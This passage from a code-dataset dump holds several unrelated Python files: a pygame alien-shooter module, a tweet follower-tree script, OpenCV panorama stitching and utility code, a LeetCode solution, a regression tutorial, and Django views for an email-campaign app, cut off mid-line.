check_keyup_events(event,ship)\n\n #向右移动飞船\n ship.rect.centerx += 1\n\ndef update_screen(ai_settings,screen,ship,aliens,bullets):\n \"\"\"更新屏幕上的图像,并切换到新屏幕\"\"\"\n # 每次循环时都重新绘制屏幕\n screen.fill(ai_settings.bg_color)\n #在飞船和外星人后面重新绘制子弹\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n ship.blitme()\n aliens.draw(screen)\n # 让最近绘制的屏幕可见\n pygame.display.flip()\n\ndef update_bullets(aliens,bullets):\n \"\"\"更新子弹位置,并删除已消失的子弹\"\"\"\n #更新子弹位置\n bullets.update()\n # 删除已消失的子弹\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n #检查是否有子弹击中外星人\n #如果是这样,就删除响应的子弹和外星人\n collisions = pygame.sprite.groupcollide(bullets,aliens,True,True)\n\ndef get_number_aliens_x(ai_settings,alien_width):\n \"\"\"计算每行可容纳多少个外星人\"\"\"\n available_space_x = ai_settings.screen_width - 2 * alien_width\n number_aliens_x = int(available_space_x / (2 * alien_width))\n return number_aliens_x\n\ndef get_number_rows(ai_settings,ship_height,alien_height):\n \"\"\"计算屏幕可容纳多少行外星人\"\"\"\n available_apace_y = (ai_settings.screen_height - (3 * alien_height) - ship_height)\n number_rows = int(available_apace_y / (2 * alien_height))\n return number_rows\n\ndef create_alien(ai_settings,screen,aliens,alien_number,row_number):\n \"\"\"创建一个外星人并将其放在当前行\"\"\"\n alien = Alien(ai_settings, screen)\n alien_width = alien.rect.width\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.y = alien.rect.height + 2 * alien.rect.height * row_number\n alien.rect.x = alien.x\n aliens.add(alien)\n\n\ndef create_fleet(ai_settings,screen,ship,aliens):\n \"\"\"创建外星人群\"\"\"\n #创建一个外星人,并计算一行可容纳多少个外星人\n #外星人间距为外星人宽度\n alien = Alien(ai_settings,screen)\n number_aliens_x = 
get_number_aliens_x(ai_settings,alien.rect.width)\n number_rows = get_number_rows(ai_settings,ship.rect.height,alien.rect.height)\n #创建外星人群\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n #创建一个外星人并将其加入前行\n create_alien(ai_settings,screen,aliens,alien_number,row_number)\n\ndef check_fleet_edges(ai_settings,aliens):\n \"\"\"有外星人到达边缘时才去对应措施\"\"\"\n for alien in aliens.sprites():\n if alien.check_edges():\n change_fleet_direction(ai_settings,aliens)\n break\n\ndef change_fleet_direction(ai_settings,aliens):\n \"\"\"将整群外星人下移,并改变他们的方向\"\"\"\n for alien in aliens.sprites():\n alien.rect.y += ai_settings.fleet_drop_speed\n ai_settings.fleet_direction *= -1\n\ndef update_aliens(ai_settings,aliens):\n \"\"\"检查是否有外星人位于屏幕边缘,并更新外星人群众所有外星人的位置\"\"\"\n check_fleet_edges(ai_settings,aliens)\n aliens.update()\n\n","sub_path":"alien_invasion/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462081014","text":"'''\nHuajie Shao@2016/9/01\nFunction: check the opinion reported by sources\nand If they are in the follower-followees trees\nInput: tweets ids---->to--->social trees\n'''\n\n# -*- coding:utf-8 -*-\nimport ast\nimport operator\n\n\n###--Fun:get the timestamp tweet_ids and sourc_ids from the tweets\nfw_time = open('Tids_Sid_time.txt','w') # record the Tw_ids and src_ids\ntweet_time = dict()\nwith open(\"input2.txt\") as tweets:\n\tfor str_texts in tweets:\n\t\tdict_tweet = ast.literal_eval(str_texts)\n\t\ttime = dict_tweet['created_at'].replace('+0000 ','')\n\t\tusers= dict_tweet['user']\t\t#get the information of users\n\t\tsrc_ids = users['id_str']\n\t\ttw_id = dict_tweet['id']\n\t\ttweet_time[str(tw_id)] = [src_ids,time] #tweet, sourc and time\n\t\tfw_time.write(str(tw_id)+'\\t'+str(src_ids)+'\\t'+str(time)+'\\n')\n\nfw_time.close()\n\n\n# #----Fun: get tweets_id and source_id_time_asstion ids\nfw_all_info = open('Tids_Sids_Aid_Tm.txt','w')\nfw_fst = open('First_sources.txt','w')\nfw_src_claim = open('Source_claims.txt','w')\nFirst_user = dict()\nfirst_src_list=[]\nFollow_count =dict()\nf_tweet_ids = open(\"cluster_desc.txt\",'r') #tweets ids and sources ids\nfor tweet_id in f_tweet_ids.readlines()[0:150]:\t# readline():[0:2]\n\tids = tweet_id.split()\n\tfor i in range(1,len(ids)):\n\t\tsrc_time = tweet_time[ids[i]]\n\t\tS_ids = src_time[0]\n\t\ttimestamp = src_time[1]\n\t\tfor j in range(i+1,len(ids)):\n\t\t\tsource_next = tweet_time[ids[j]]\n\t\t\tnext_sids = source_next[0]\n\t\t\tif S_ids != next_sids:\n\t\t\t\tsrc_pair = (S_ids,next_sids)\n\t\t\t\tif src_pair in Follow_count:\n\t\t\t\t\tFollow_count[src_pair] += 1\n\t\t\t\telse:\n\t\t\t\t\tFollow_count[src_pair] = 1\n\t\t\n\t\tif i == 1:\n\t\t\tFirst_user[ids[0]] = S_ids\n\t\t\tfw_fst.write(S_ids+'\\n')\n\t\t\tfirst_src_list.append(S_ids) #get the first sources\n\n\t\tfw_all_info.write(ids[i]+'\\t'+S_ids+'\\t'+ids[0]+'\\t'+timestamp+'\\n')\n\t\tfw_src_claim.write(S_ids+'\\t'+ids[0]+'\\n')\n\t\t\n\nfw_all_info.close()\nfw_fst.close()\n\n# print(Follow_count[('1','1')])\nfw_graph = open('Ancestor-children.txt','w')\nRank_graph = sorted(Follow_count.items(), key=operator.itemgetter(1), reverse=True)\nfor elments in Rank_graph:\n\tif elments[1] >1:\n\t\tancestor = elments[0][0]\n\t\tchild = elments[0][1]\n\t\tfw_graph.write(ancestor+'\\t'+child+'\\n')\n\t\t# print(elments[0])\n\nfw_graph.close()\nprint(\"good work, well 
done\")\n","sub_path":"EM-opinion/Check_opinion_follower_tree.py","file_name":"Check_opinion_follower_tree.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616881514","text":"import numpy as np\nimport cv2\nimport sys\nfrom matchers import matchers\nimport time\nfrom panorama import Sticher\nclass Stitch:\n\tdef __init__(self, args):\n\t\tself.path = args\n\t\tfp = open(self.path, 'r')\n\t\tfilenames = [each.rstrip('\\r\\n') for each in fp.readlines()]\n\t\tprint( filenames)\n\t\tself.images = [cv2.resize(cv2.imread(each),(960, 720)) for each in filenames]\n\t\t#self.images = [cv2.imread(each) for each in filenames]\n\t\tself.count = len(self.images)\n\t\tself.left_list, self.right_list, self.center_im = [], [],None\n\t\tself.matcher_obj = matchers()\n\t\tself.prepare_lists()\n\n\tdef warpTwoImages(self, img2, img1, H):\n\t\t'''warp img2 to img1 with homograph H'''\n\t\th1,w1 = img1.shape[:2]\n\t\th2,w2 = img2.shape[:2]\n\t\tpts1 = np.array([[0,0],[0,h1],[w1,h1],[w1,0]], dtype= 'f').reshape(-1,1,2)\n\t\tpts2 = np.array([[0,0],[0,h2],[w2,h2],[w2,0]], dtype= 'f').reshape(-1,1,2)\n\t\tpts2_ = cv2.perspectiveTransform(pts2, H)\n\t\tpts = np.concatenate((pts1, pts2_), axis=0)\n\t\t[xmin, ymin] = np.array(pts.min(axis=0).ravel() - 0.5,dtype='int')\n\t\t[xmax, ymax] = np.array(pts.max(axis=0).ravel() + 0.5,dtype='int')\n\t\tprint(\"mins are\")\n\t\tprint(xmin,ymin)\n\t\tt = [-xmin,-ymin]\n\t\tHt = np.array([[1,0,t[0]],[0,1,t[1]],[0,0,1]]) # translate\n\t\t\n\t\ta = xmax-xmin\n\t\tb = (ymax-ymin)\n\t\tprint(a,b)\n\t\t# paddy = np.zeros([b,a,3])\n\t\t# print('paddy= ',paddy.shape)\n\t\t# print('img2= ',img2.shape)\n\t\t# paddy[0:img2.shape[0],0:img2.shape[1]] = img2\n\n\t\t#np.pad(img2, ((0,2), (0,2)),'constant',constant_values=0)\n\n\n\t\t# warped img2\n\t\tresult = cv2.warpPerspective(img2, Ht.dot(H), dsize=(a,b))\t\t# do blending here somewhere! ! ! ! 
!\n\n\t\tprint('result= ',result.shape)\n\t\t# src_mask = np.zeros(img1.shape, img1.dtype) \n\n\t\t# adding base image to the warped image (overlapping it if required)\t\t# this part merges old image ( abhi tak ka panorama) on top of newly warped\n\t\tfor i in range(h1):\n\t\t\tfor j in range(w1):\n\t\t\t\tif(img1[i,j].all()!=0): # all 3 coordinates are non-0\n\t\t\t\t\t# src_mask[i,j]=1\n\t\t\t\t\t# #alpha = 0.75\n\t\t\t\t\t# #beta=1-alpha\n\t\t\t\t\tresult[t[1]+i,t[0]+j]=img1[i,j]\n\t\t\t\t\t#cv2.addWeighted( img1[i,j], alpha, result[i,j], beta, 0.0, result[t[1]+i,t[0]+j]);\n\n\n\t\t\n\t\t# poly = np.array([ [4,80], [30,54], [151,63], [254,37], [298,90], [272,134], [43,122] ], np.int32)\n\t\t# cv2.fillPoly(src_mask, [poly], (255, 255, 255))\n\t\t \n\t\t# # This is where the CENTER of the airplane will be placed\n\t\t# center = (t[1]+h1//2,t[0]+w1//2)\n\t\t# # Clone seamlessly.\n\t\t# a = xmax-xmin-img1.shape[0]\n\t\t# b = (ymax-ymin-img1.shape[1])\n\n\t\t# print(xmax-xmin-img1.shape[0])\n\n\t\t# np.pad(img1, ((0,a), (0,b)),'constant',constant_values=0)\n\t\t# output = cv2.seamlessClone(img1, result, src_mask, center, cv2.NORMAL_CLONE)\n\t\t# cv2.imwrite(\"hey.jpg\", output);\n\t\treturn result\n\n\tdef prepare_lists(self):\n\t\tprint( \"Number of images : %d\"%self.count)\n\t\tself.centerIdx =self.count/2 \n\t\tprint( \"Center index image : %d\"%self.centerIdx)\n\t\tself.center_im = self.images[int(self.centerIdx)]\n\t\tfor i in range(self.count):\n\t\t\tif(i<=self.centerIdx):\n\t\t\t\tself.left_list.append(self.images[i])\n\t\t\telse:\n\t\t\t\tself.right_list.append(self.images[i])\n\t\tprint( \"Image lists prepared\")\n\n\tdef leftshift(self):\n\t\t# self.left_list = reversed(self.left_list)\n\t\tb = self.left_list[-1]\n\t\tfor a in reversed(self.left_list[0:-1]):\n\t\t\tH = self.matcher_obj.match(a,b,'left','homography')\n\t\t\t# print( \"Homography is : \", H)\n\t\t\txh = np.linalg.inv(H)\n\t\t\t# print( \"Inverse Homography :\", xh)\n\t\t\tds = np.dot(xh, np.array([a.shape[1], a.shape[0], 1]));\n\t\t\tds = ds/ds[-1]\n\t\t\t# print( \"final ds=>\", ds)\n\t\t\tf1 = np.dot(xh, np.array([0,0,1]))\n\t\t\tf1 = f1/f1[-1]\n\t\t\txh[0][-1] += abs(f1[0])\n\t\t\txh[1][-1] += abs(f1[1])\n\t\t\tds = np.dot(xh, np.array([a.shape[1], a.shape[0], 1]))\n\t\t\toffsety = abs(int(f1[1]))\n\t\t\toffsetx = abs(int(f1[0]))\n\t\t\tdsize = (int(ds[0])+offsetx, int(ds[1]) + offsety)\n\t\t\tprint( \"image dsize =>\", dsize)\n\t\t\t#tmp = cv2.warpPerspective(a, xh, dsize)\n\t\t\t# cv2.imshow(\"warped\", tmp)\n\t\t\t# cv2.waitKey()\n\t\t\tprint((b.shape))\n\t\t\t#tmp[offsety:b.shape[0]+offsety, offsetx:b.shape[1]+offsetx] = b\n\t\t\t#tmp[0:b.shape[0], 0:b.shape[1]] = b\n\n\t\t\t(tmp) = stitcher.stitch([a, b])\n\t\t\t# tmp = self.warpTwoImages(a,b,H)\n\t\t\t# tmp = self.mix_and_match(a, tmp)\n\t\t\tb = tmp\n\n\t\tself.leftImage = b\n\n\t\t\n\tdef rightshift(self):\n\t\ta = self.leftImage\n\t\tfor b in self.right_list:\n\t\t\tH = self.matcher_obj.match(b, a, 'right', 'homography')\n\t\t\tprint( \"Homography :\", H)\n\t\t\t# txyz = np.dot(H, np.array([b.shape[1], b.shape[0], 1]))\n\t\t\t# txyz = txyz/txyz[-1]\n\t\t\t# dsize = (int(txyz[0])+a.shape[1], int(txyz[1])+a.shape[0])\n\t\t\t#tmp = cv2.warpPerspective(b, H, dsize)\n\t\t\t# cv2.imshow(\"tp\", tmp)\n\t\t\t# cv2.waitKey()\n\t\t\t# tmp[:a.shape[0], :a.shape[1]]=a\n\t\t\t\n\t\t\t# print( \"tmp shape\",tmp.shape)\n\t\t\t# print( \"a shape=\", a.shape)\n\n\t\t\t(tmp) = stitcher.stitch([a, b])\n\t\t\t# tmp = self.warpTwoImages(b,a,H)\n\t\t\t#tmp = 
self.mix_and_match(a, tmp)\n\t\t\ta = tmp\n\n\t\tself.leftImage = a\n\t\t# self.showImage('left')\n\n\n\tdef Laplacian_blending(self, A,B,mask,levels=4):\n\n\t\n# generate Gaussian pyramid for A\n\t\tG = A.copy()\n\t\tgpA = [G]\n\t\tfor i in xrange(6):\n\t\t\tG = cv2.pyrDown(G)\n\t\t\tgpA.append(G)\n\n\t\t# generate Gaussian pyramid for B\n\t\tG = B.copy()\n\t\tgpB = [G]\n\t\tfor i in xrange(6):\n\t\t\tG = cv2.pyrDown(G)\n\t\t\tgpB.append(G)\n\n\t\t# generate Laplacian Pyramid for A\n\t\tlpA = [gpA[5]]\n\t\tfor i in xrange(5,0,-1):\n\t\t\tGE = cv2.pyrUp(gpA[i])\n\t\t\tL = cv2.subtract(gpA[i-1],GE)\n\t\t\tlpA.append(L)\n\n\t\t# generate Laplacian Pyramid for B\n\t\tlpB = [gpB[5]]\n\t\tfor i in xrange(5,0,-1):\n\t\t\tGE = cv2.pyrUp(gpB[i])\n\t\t\tL = cv2.subtract(gpB[i-1],GE)\n\t\t\tlpB.append(L)\n\n\t\t# Now add left and right halves of images in each level\n\t\tLS = []\n\t\tfor la,lb in zip(lpA,lpB):\n\t\t\trows,cols,dpt = la.shape\n\t\t\tls = np.hstack((la[:,0:cols/2], lb[:,cols/2:]))\n\t\t\tLS.append(ls)\n\n\t\t# now reconstruct\n\t\tls_ = LS[0]\n\t\tfor i in xrange(1,6):\n\t\t\tls_ = cv2.pyrUp(ls_)\n\t\t\tls_ = cv2.add(ls_, LS[i])\n\n\n\t\treturn ls_\n\n\n\n\n\tdef mix_and_match(self, leftImage, warpedImage):\n\t\ti1y, i1x = leftImage.shape[:2]\n\t\ti2y, i2x = warpedImage.shape[:2]\n\t\tprint( leftImage[-1,-1])\n\n\t\tt = time.time()\n\t\tblack_l = np.where(leftImage == np.array([0,0,0]))\n\t\tblack_wi = np.where(warpedImage == np.array([0,0,0]))\n\t\tprint( time.time() - t)\n\t\t# print( black_l[-1])\n\n\t\tfor i in range(0, i1x):\n\t\t\tfor j in range(0, i1y):\n\t\t\t\ttry:\n\t\t\t\t\tif(np.array_equal(leftImage[j,i],np.array([0,0,0])) and np.array_equal(warpedImage[j,i],np.array([0,0,0]))):\n\t\t\t\t\t\t# print( \"BLACK\")\n\t\t\t\t\t\t# instead of just putting it with black, \n\t\t\t\t\t\t# take average of all nearby values and avg it.\n\t\t\t\t\t\twarpedImage[j,i] = [0, 0, 0]\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(np.array_equal(warpedImage[j,i],[0,0,0])):\n\t\t\t\t\t\t\t# print( \"PIXEL\")\n\t\t\t\t\t\t\twarpedImage[j,i] = leftImage[j,i]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif not np.array_equal(leftImage[j,i], [0,0,0]):\n\t\t\t\t\t\t\t\tbw, gw, rw = warpedImage[j,i]\n\t\t\t\t\t\t\t\tbl,gl,rl = leftImage[j,i]\n\t\t\t\t\t\t\t\t# b = (bl+bw)/2\n\t\t\t\t\t\t\t\t# g = (gl+gw)/2\n\t\t\t\t\t\t\t\t# r = (rl+rw)/2\n\t\t\t\t\t\t\t\twarpedImage[j, i] = [bl,gl,rl]\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t# cv2.imshow(\"waRPED mix\", warpedImage)\n\t\t# cv2.waitKey()\n\t\treturn warpedImage\n\n\n\n\tdef trim_left(self):\n\t\tpass\n\n\tdef showImage(self, string=None):\n\t\tif string == 'left':\n\t\t\tcv2.imwrite(\"./hey/leftImage.jpg\", self.leftImage)\n\t\t\t# cv2.imshow(\"left image\", cv2.resize(self.leftImage, (400,400)))\n\t\telif string == \"right\":\n\t\t\tcv2.imwrite(\"./hey/rightImage.jpg\", self.rightImage)\n\n\nif __name__ == '__main__':\n\ttry:\n\t\targs = sys.argv[1]\n\texcept:\n\t\targs = \"./txtlists/files3.txt\"\n\tfinally:\n\t\tprint( \"Parameters : \", args)\n\ts = Stitch(args)\n\ts.leftshift()\n\t# s.showImage('left')\n\ts.rightshift()\n\n\tprint((\"done\"))\n\tcv2.imwrite(\"./Outputs/answer.jpg\", s.leftImage)\n\tprint( \"image written\")\n\tcv2.destroyAllWindows()\n\t\n","sub_path":"pano_less_error.py","file_name":"pano_less_error.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414231964","text":"# title: find-the-town-judge\n# detail: 
https://leetcode.com/submissions/detail/401423407/\n# datetime: Sun Sep 27 23:42:16 2020\n# runtime: 764 ms\n# memory: 18.6 MB\n\nclass Solution:\n def findJudge(self, N: int, trust: List[List[int]]) -> int:\n cnt = collections.Counter()\n s = set()\n for a, b in trust:\n cnt[b] += 1\n s.add(a)\n m = cnt.most_common(2)\n if not m :\n if N == 1:\n return 1\n return -1\n if m[0][1] == N - 1 and (len(m) == 1 or m[1][1] < N - 1) and m[0][0] not in s:\n return m[0][0]\n return -1 ","sub_path":"leetcode/find-the-town-judge/401423407.py","file_name":"401423407.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"507478528","text":"import numpy as np, cv2, time\n\ndef print_matInfo(name, image): # 행렬 정보 출력 함수\n if image.dtype == 'uint8': mat_type = \"CV_8U\"\n elif image.dtype == 'int8': mat_type = \"CV_8S\"\n elif image.dtype == 'uint16': mat_type = \"CV_16U\"\n elif image.dtype == 'int16': mat_type = \"CV_16S\"\n elif image.dtype == 'float32': mat_type = \"CV_32F\"\n elif image.dtype == 'float64': mat_type = \"CV_64F\"\n nchannel = 3 if image.ndim == 3 else 1\n\n # depth, channel 출력\n print(\"%12s: depth(%s), channels(%s) -> mat_type(%sC%d)\"\n % (name, image.dtype, nchannel, mat_type, nchannel))\n\n# 수행시간 체크 함수\nstime = 0\ndef ck_time(mode = 0 , msg = \"\"):\n global stime\n\n if (mode ==0 ):\n stime = time.perf_counter()\n\n elif (mode==1):\n etime = time.perf_counter()\n elapsed = (etime - stime)\n print(\"수행시간 = %.5f sec\" % elapsed) # 초 단위 경과 시간\n\n elif (mode == 2):\n etime = time.perf_counter()\n return (etime - stime)\n\n elif (mode== 3 ):\n etime = time.perf_counter()\n elapsed = (etime - stime)\n print(\"%s = %.5f sec\" %(msg, elapsed)) # 초 단위 경과 시간\n\ndef time_check(func, image, size, title): ## 수행시간 체크 함수\n\tstart_time = time.perf_counter()\n\tret_img = func(image, size)\n\telapsed = (time.perf_counter() - start_time) * 1000\n\tprint(\"%s elapsed time = %0.2f ms\" % (title, elapsed))\n\treturn ret_img\n\n\n# 문자열 출력 함수 - 그림자 효과\ndef put_string(frame, text, pt, value=None, color=(120, 200, 90)) :\n text = str(text) + str(value)\n shade = (pt[0] + 2, pt[1] + 2)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(frame, text, shade, font, 0.7, (0, 0, 0), 2) # 그림자 효과\n cv2.putText(frame, text, pt , font, 0.7, color, 2) # 작성 문자\n\ndef print_mat(image , name = \"mat\"):\n print(name)\n if len(image.shape) == 1 :\n for i in range(image.shape[0]):\n print(\"%2.2f \" %image[i] , end='')\n\n elif len(image.shape) == 2 :\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n print(\"%s \" %image[i,j], end='')\n print()\n\n print()\n\ndef contain(p, shape): # 좌표(y,x)가 범위내 인지 검사\n return 0<= p[0] < shape[0] and 0<= p[1] < shape[1]\n\ndef contain_pts(p, p1, p2):\n return p1[0] <= p[0] < p2[0] and p1[1] <= p[1] < p2[1]\n\n# 시작점 종료점 사각형을 시작점, 크기 형식으로 변환\ndef rect_convert(rect):\n x0, y0, x1, y1 = rect\n pt1, pt2 = (x0, y0), (x1, y1)\n size = np.subtract(pt2, pt1) # 두좌표 차분 - 너비 높이 계산\n\n return (pt1[0], pt1[1], size[0], size[1])\n\n# 시작점과 크기로 사각형 정의\ndef define_rect(pt, size):\n return (pt[0], pt[1], size[0], size[1])\n\n# 시작점 종료점으로 사각형 정의\ndef define_rect_pt(pt1, pt2):\n size = np.subtract(pt2, pt1) # 두좌표 차분 - 너비 높이 계산\n return (pt1[0], pt1[1], size[0], size[1])","sub_path":"Common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"461385543","text":"#Multiple Linear 
Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\nY = dataset.iloc[:, 4].values\n\n# Encoding Categorical Data\n# Encoding the Independent Variable\n# 1st Column: Cali, 2nd Column: Florida, 3rd Column: New York\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:,3] = labelencoder_X.fit_transform(X[:,3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n#Avoiding the Dummy Variable Trap [Remove Cali from the Dataset]\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\n\"\"\"from sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\nsc_y = StandardScaler()\ny_train = sc_y.fit_transform(y_train)\"\"\"\n\n\n\n# Fitting Multiple Linear \nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression() #Create regressor object\nregressor.fit(X_train, Y_train) #Fit our regressor to our regressor\n\n# Predicting the Test set results\nY_pred = regressor.predict(X_test)\n\n\n# Curently we have created the 'All-in' Model\n# ---- Building the optimal model using Backward Elimination ------\n\n\nimport statsmodels.formula.api as sm\n#Create column of 1s that represent the b0 constant of the equation\nX = np.append(arr = np.ones((50,1)).astype(int), values = X, axis = 1) \nX_opt = X[:,[0,1,2,3,4,5]]\n\n# Step 2 of Backward Elimination\nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() # Create Ordinary Least Squares Regressor\nregressor_OLS.summary() # <---- From the summary we notice that x2 has the highest P value > SL\n\nX_opt = X[:,[0,1,3,4,5]] # Therefore we remove x2 from the equation, refit our regressor and see the new summary\nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n\nX_opt = X[:,[0,3,4,5]] \nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n\nX_opt = X[:,[0,3,5]] \nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n\nX_opt = X[:,[0,3]] \nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n","sub_path":"UdemyMachineLearning/Multiple_Linear_Regression/multiple_linear_regression(Jordan).py","file_name":"multiple_linear_regression(Jordan).py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"64739066","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail, EmailMultiAlternatives\nfrom django.http import Http404, BadHeaderError, HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.template import Template\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\nfrom mailer.forms import UserForm, GroupForm, ContactForm, LetterForm, CampaignForm\nfrom mailer.models import Group, Contact, Letter, Campaign\n\n\ndef sing_up(request):\n user_form = 
UserForm()\n\n if request.method == 'POST':\n user_form = UserForm(request.POST)\n\n if user_form.is_valid():\n User.objects.create_user(**user_form.cleaned_data)\n\n login(request, authenticate(\n username=user_form.cleaned_data['username'],\n password=user_form.cleaned_data['password']\n ))\n\n return redirect('/')\n\n return render(request, 'auth/sing_up.html', {\n 'user_form': user_form\n })\n\n\n@login_required(login_url='sing-in')\ndef home(request):\n return render(request, template_name='mailer/home.html') \\\n \\\n \\\n@login_required(login_url='sing-in')\ndef groups(request):\n user = request.user\n group_list = user.group_set.all()\n return render(request, 'mailer/groups.html',\n {'group_list': group_list})\n\n\n@login_required(login_url='sing-in')\ndef create_group(request):\n group_form = GroupForm\n\n if request.method == 'POST':\n group_form = GroupForm(request.POST)\n if group_form.is_valid():\n new_group = group_form.save(commit=False)\n new_group.user = request.user\n new_group.save()\n\n return redirect(groups)\n\n return render(request, 'mailer/groups_create.html',\n {'group_form': group_form})\n\n\n@login_required(login_url='sing-in')\ndef update_group(request, group_id):\n group_form = GroupForm(instance=Group.objects.get(id=group_id))\n\n group = Group.objects.get(id=group_id)\n if group.user != request.user:\n raise Http404\n\n if request.method == 'POST':\n group_form = GroupForm(request.POST, instance=group)\n if group_form.is_valid():\n group_form.save()\n\n return redirect(groups)\n\n return render(request, 'mailer/groups_update.html',\n {'group_form': group_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_group(request, group_id):\n Group.objects.get(id=group_id).delete()\n return redirect(groups)\n\n\n@login_required(login_url='sing-in')\ndef contacts(request, group_id):\n contact_list = Contact.objects.filter(group=group_id)\n return render(request, 'mailer/contacts.html',\n {'contact_list': contact_list,\n 'group_id': group_id})\n\n\n@login_required(login_url='sing-in')\ndef create_contact(request, group_id):\n contact_form = ContactForm\n\n if request.method == 'POST':\n contact_form = ContactForm(request.POST)\n if contact_form.is_valid():\n new_contact = contact_form.save(commit=False)\n new_contact.group = Group.objects.get(id=group_id)\n new_contact.save()\n\n return redirect(contacts, group_id=group_id)\n\n return render(request, 'mailer/contact_create.html',\n {'contact_form': contact_form})\n\n\n@login_required(login_url='sing-in')\ndef update_contact(request, contact_id):\n contact_form = ContactForm(instance=Contact.objects.get(id=contact_id))\n\n if request.method == 'POST':\n contact_form = ContactForm(request.POST, instance=Contact.objects.get(id=contact_id))\n if contact_form.is_valid():\n contact = contact_form.save()\n group_id = contact.group.id\n return redirect(contacts, group_id=group_id)\n\n return render(request, 'mailer/contact_update.html',\n {'contact_form': contact_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_contact(request, contact_id):\n contact = Contact.objects.get(id=contact_id)\n group_id = contact.group.id\n contact.delete()\n return redirect(contacts, group_id=group_id)\n\n\n@login_required(login_url='sing-in')\ndef letters(request):\n user = request.user\n letter_list = user.letter_set.all()\n return render(request, 'mailer/letters.html',\n {'letter_list': letter_list})\n\n\n@login_required(login_url='sing-in')\ndef create_letter(request):\n letter_form = LetterForm\n\n if request.method == 
'POST':\n letter_form = LetterForm(request.POST)\n if letter_form.is_valid():\n new_letter = letter_form.save(commit=False)\n new_letter.user = request.user\n new_letter.save()\n\n return redirect(letters)\n\n return render(request, 'mailer/letter_create.html',\n {'letter_form': letter_form})\n\n\n@login_required(login_url='sing-in')\ndef update_letter(request, letter_id):\n letter_form = LetterForm(instance=Letter.objects.get(id=letter_id))\n\n if request.method == 'POST':\n letter_form = LetterForm(request.POST, instance=Letter.objects.get(id=letter_id))\n if letter_form.is_valid():\n letter_form.save()\n\n return redirect(letters)\n\n return render(request, 'mailer/letter_update.html',\n {'letter_form': letter_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_letter(request, letter_id):\n Letter.objects.get(id=letter_id).delete()\n return redirect(letters)\n\n\n@login_required(login_url='sing-in')\ndef campaign(request):\n user = request.user\n campaign_list = user.campaign_set.all()\n return render(request, 'mailer/campaign.html',\n {'campaign_list': campaign_list})\n\n\n@login_required(login_url='sing-in')\ndef create_campaign(request):\n campaign_form = CampaignForm\n\n if request.method == 'POST':\n campaign_form = CampaignForm(request.POST)\n if campaign_form.is_valid():\n new_campaign = campaign_form.save(commit=False)\n new_campaign.user = request.user\n new_campaign.save()\n\n return redirect(campaign)\n\n return render(request, 'mailer/campaign_create.html',\n {'campaign_form': campaign_form})\n\n\n@login_required(login_url='sing-in')\ndef update_campaign(request, campaign_id):\n campaign_form = CampaignForm(instance=Campaign.objects.get(id=campaign_id))\n\n if request.method == 'POST':\n campaign_form = CampaignForm(request.POST, instance=Campaign.objects.get(id=campaign_id))\n if campaign_form.is_valid():\n campaign_form.save()\n\n return redirect(campaign)\n\n return render(request, 'mailer/campaign_update.html',\n {'campaign_form': campaign_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_campaign(request, campaign_id):\n Campaign.objects.get(id=campaign_id).delete()\n return redirect(campaign)\n\n\n@login_required(login_url='sing-in')\ndef review_campaign(request, campaign_id):\n campaign = Campaign.objects.get(id=campaign_id)\n return render(request, 'mailer/campaign_review.html',\n {'contacts': campaign.group.contact_set.all(),\n 'letter': campaign.letter,\n 'campaign': campaign})\n\n\n@login_required(login_url='sing-in')\ndef send_campaign(request, campaign_id):\n this_campaign = Campaign.objects.get(id=campaign_id)\n letter = this_campaign.letter.body\n email_list = 